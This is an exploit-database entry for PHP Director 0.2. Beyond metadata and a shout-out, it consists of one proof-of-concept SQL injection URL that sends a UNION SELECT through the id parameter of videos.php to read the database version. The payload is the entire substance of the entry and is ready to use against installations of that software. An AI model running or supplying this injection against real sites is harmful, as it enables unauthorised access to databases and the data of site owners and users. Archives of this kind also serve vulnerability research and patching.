PHP Director 0.2 - SQL Injection

EDB-ID:

13738

CVE:

N/A


Author:

Mr.Rat

Type:

webapps


Platform:

PHP

Date:

2010-06-06


# Exploit Title:
 PHP Director 0.2 Sql Injection.

# Date: 05/06/2010

# Author: 
Mr.Rat [ NaSrO22@HoTmAiL.Fr ]

# Software Link: www.phpdirector.co.uk

# Version: 0.2

# Tested on: Windows 
Xp SP2

# Code : 



http://victim.com/path/videos.php?id=-44+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--



Greetz
 To My Best Friend :: Hacker-Noir ;)